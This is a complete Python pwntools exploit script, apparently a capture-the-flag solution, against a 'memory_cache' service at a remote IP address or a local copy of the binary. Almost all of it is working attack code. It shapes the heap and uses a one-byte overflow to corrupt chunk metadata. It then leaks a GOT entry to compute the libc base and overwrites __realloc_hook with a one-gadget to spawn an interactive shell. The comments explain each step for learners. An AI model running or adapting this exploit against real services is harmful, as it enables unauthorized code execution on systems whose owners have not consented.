full exploit memory cache
from pwn import *
import time
# Target selection. REMOTE switches between the live service and a local copy
# of the binary; DEBUG additionally parks the local process until a debugger
# attaches (presumably what proc.wait_for_debugger does -- not verified here).
# `p` is the single I/O channel every helper below talks through.
REMOTE = False
DEBUG = False
p = remote("103.55.141.111", 2954) if REMOTE else process("./memory_cache")
if DEBUG:
    proc.wait_for_debugger(p.pid)
def set_cache(name, size, value, wait=True):
    """Issue one SET transaction on the shared channel `p`.

    Three lines are sent in order -- ``SET <name>``, the size, then the
    body -- each followed by a fixed 0.1 s pause. The pauses are part of
    the observed protocol timing and are deliberately kept; the author
    presumably found the service reads one line per prompt (unverified).

    Args:
        name: cache key appended to the SET command.
        size: length announced to the service (sent as decimal text).
        value: raw body bytes sent after the size.
        wait: when true, consume the service's ``OK`` before returning.
    """
    for line in ("SET " + name, str(size), value):
        p.sendline(line)
        time.sleep(0.1)
    if wait:
        p.readuntil("OK")
def get_cache(name):
    """Issue GET for `name` and return the remainder of the reply line.

    Everything up to and including the ``", "`` separator is consumed and
    discarded; the rest of that line is returned raw (trailing newline
    included, as read from the channel).
    """
    p.sendline("GET " + name)
    p.readuntil(", ")
    return p.readline()
# Exploit driver for the challenge service: heap-layout shaping, one
# out-of-bounds write, then a GOT read used as the libc leak. From a
# defender's view the root issue is the single unbounded write at the
# "overflow" step below; everything after it is consequence.
# Wait for init
# Let the freshly started service settle, then consume its first line
# (presumably a banner/prompt -- not verified here) before sending commands.
time.sleep(1)
print p.readline()
# align heap
# Four SETs whose names, sizes and order shape the heap so the later
# overflow lands on a known neighbour; do not reorder them.
set_cache("a", 24, "a"*24)
set_cache("b", 56, "b"*56)
set_cache("a", 56, "a"*56)
set_cache("c", 56, "c"*56)
# overflow chunk `a` size
# Re-SET "b" one byte larger than its earlier 56-byte entry; per the author's
# comment this lands on the neighbouring chunk's size field. Service-side the
# defect exercised is presumably a write sized by the new length rather than
# by the existing allocation (the binary itself is not visible on this page).
set_cache("b", 57, "b"*56 + "\xff")
# overwrite c->data pointer to got for get got table value
# Per the author's comment, the bytes after "a"'s own 56 rewrite c's metadata
# so that GET c returns 8 bytes read from the GOT slot 0x602048 instead of
# c's data (an info leak). The three large qword constants are reproduced
# verbatim; their meaning is not documented on this page.
set_cache("a", 112, "a"*56 + p64(0x41) + p64(0xcfc6e51e26fd662b) + p64(0x00b6ba66a47fdec8) + p64(0x00000000694ffebc) + p64(8) + p64(0x0000000000602048))
leak = get_cache("c")
# leak got and search for libc version
# Commented-out dump the author used once to identify the libc build from
# the leaked GOT addresses; kept as a bare string literal so it never runs.
"""
leak_libc = []
for i in range(0, 64, 8):
print hex(u64(leak[i:i+8]))
read 0x7f95c0b91220
__libc_start_main 0x7f95c0aba740
SHA1_Init 0x7f95c0ecebc0
free 0x7f95c0b1e4f0
strlen 0x7f95c0b25720
atoi 0x7f95c0ad0e80
SHA1_Final 0x7f95c0ecea20
strchr 0x7f95c0b23ab0
"""
# libc offsets for the build the target is known to run. Each triple is only
# valid for the exact package named beside it; against any other build the
# derived addresses are wrong and the final write simply crashes the target.
if REMOTE:
    # libc version libc6_2.23-0ubuntu10_amd64
    atoi_offset, _realloc_hook_offset, one_gadget_offset = (
        0x036e80, 0x3c4b08, 0xf1147)
else:
    # libc version libc6_2.27-3ubuntu1_amd64
    atoi_offset, _realloc_hook_offset, one_gadget_offset = (
        0x40680, 0x3ebc28, 0x10a38c)

# The script treats the first 8 leaked bytes as atoi's address and rebases
# every other libc address from it.
atoi_addr = u64(leak[:8])
print("atoi addr: " + hex(atoi_addr))
libc_base = atoi_addr - atoi_offset
print("base libc: " + hex(libc_base))
_realloc_hook_addr = libc_base + _realloc_hook_offset
print("__realloc_hook addr: " + hex(_realloc_hook_addr))
one_gadget_addr = libc_base + one_gadget_offset
print("one gadget addr: " + hex(one_gadget_addr))
# overwrite _realloc_hook to one gadget
# Same metadata rewrite as the leak step, now with c's data pointer aimed at
# __realloc_hook (the "- 8 - 8 + 5" adjustment is the author's and is not
# re-derived here) so that a following SET on "c" writes through it.
# NOTE(review): this depends on a writable __realloc_hook; glibc 2.34 and
# later no longer provide the malloc hooks, so the technique stops there.
set_cache("a", 112, "a"*56 + p64(0x41) + p64(0xcfc6e51e26fd662b) + p64(0x00b6ba66a47fdec8) + p64(0x00000000694ffebc) + p64(96) + p64(_realloc_hook_addr - 8 - 8 + 5))
leak = get_cache("c")
# Replay the first 11 bytes just read unchanged so only the slot after them
# receives one_gadget_addr.
set_cache("c", 19, leak[:11] + p64(one_gadget_addr))
# trig realloc and get shell
# wait=False: the author skips waiting for "OK" here, presumably because the
# hooked call never returns to the normal reply path; control then passes to
# the interactive session.
set_cache("d", 1, "", False)
p.interactive()